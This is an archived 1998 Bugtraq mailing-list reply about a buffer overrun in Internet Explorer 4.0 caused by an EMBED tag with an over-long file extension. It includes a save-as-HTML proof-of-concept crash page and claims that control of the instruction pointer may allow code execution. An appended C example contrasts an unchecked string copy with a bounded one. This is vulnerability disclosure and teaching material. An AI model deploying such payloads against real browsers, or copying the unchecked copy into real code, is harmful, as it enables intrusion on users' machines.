Bugtraq mailing list archives
Re: MSIE buffer overrun
From: pt95cho () STUDENT HK-R SE (Christian Holmqvist)
Date: Fri, 20 Mar 1998 17:13:10 +0100
On Fri, 20 Mar 1998, Georgi Guninski wrote:

Hi!

This not only crashes MSIE4 but also Eudora4.0 (yes the mail reader...)
I can't read this mail without a crash. I had to read it in pine on a unix system.

Cheers
Christian

Microsoft Internet Explorer 4.0 (don't know for other versions) can be crashed and eventually made to execute arbitrary code with a little help of the <EMBED> tag.

The following:
<EMBED SRC=file://C|/A.ABOUT_200_CHARACTERS_HERE___________________>
opens a dialog box and closes IE 4.0.

It seems that the long file extension causes stack overrun. The stack is smashed - full with our values, EIP is also ours and CS=SS. So probably a string could be constructed, executing code at the client's machine.

Solution: Do not browse hostile pages.

To try this: http://www.geocities.com/ResearchTriangle/1711/msie.html

Georgi Guninski
http://www.geocities.com/ResearchTriangle/1711

-----------------------cut here and save as crashmsie.html---------------------
<HTML>
Trying to crash IE 4.0
<EMBED SRC=file://C|/A.012345678901234567890123456789012345678901234567890123456789012345678901234567890123456756789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789>
40 80 160 170 180 190 200
</HTML>

Best regards,
Christian

/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\
| Christian Holmqvist |
| Email: pt95cho () student hk-r se |
| Tele: 0457-17754 |
\________________________________/
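
The bug class this thread describes (an over-long file extension overrunning a fixed stack buffer), shown as an added example that is not part of the original posts and not Microsoft's or Eudora's code: an unchecked copy beside a bounded one that rejects oversized extensions. The function names, the 16-byte `EXT_MAX` limit and the sample URLs are assumptions made for the illustration.

```c
#include <stdio.h>
#include <string.h>

#define EXT_MAX 16 /* assumed buffer size for this example, not taken from IE */

/* Unsafe pattern, shown for contrast and never called: the extension length
 * comes from the page, so strcpy can run past the fixed stack buffer. */
int ext_is_html_unsafe(const char *url) {
    char ext[EXT_MAX];
    const char *dot = strrchr(url, '.');
    if (dot == NULL) return 0;
    strcpy(ext, dot + 1); /* no length check */
    return strcmp(ext, "html") == 0;
}

/* Hardened form (hypothetical helper): copies the extension only if it fits.
 * Returns 0 on success, -1 if there is no extension, -2 if it is too long. */
int get_extension(const char *url, char *out, size_t out_size) {
    if (url == NULL || out == NULL) return -1;
    const char *slash = strrchr(url, '/');
    const char *name = slash ? slash + 1 : url;
    const char *dot = strrchr(name, '.');
    if (dot == NULL || dot[1] == '\0') return -1;
    size_t len = strlen(dot + 1);
    if (len >= out_size) return -2; /* reject, do not truncate or overflow */
    memcpy(out, dot + 1, len + 1);  /* len + 1 copies the terminating NUL */
    return 0;
}

int main(void) {
    char ext[EXT_MAX];
    char long_url[256] = "file://C|/A."; /* constructed input */
    memset(long_url + strlen(long_url), '0', 200); /* 200-character extension */
    /* the rest of long_url is already zero from the initializer */
    printf("short: %d\n", get_extension("file://C|/A.html", ext, sizeof ext));
    printf("long:  %d\n", get_extension(long_url, ext, sizeof ext));
    return 0;
}
```
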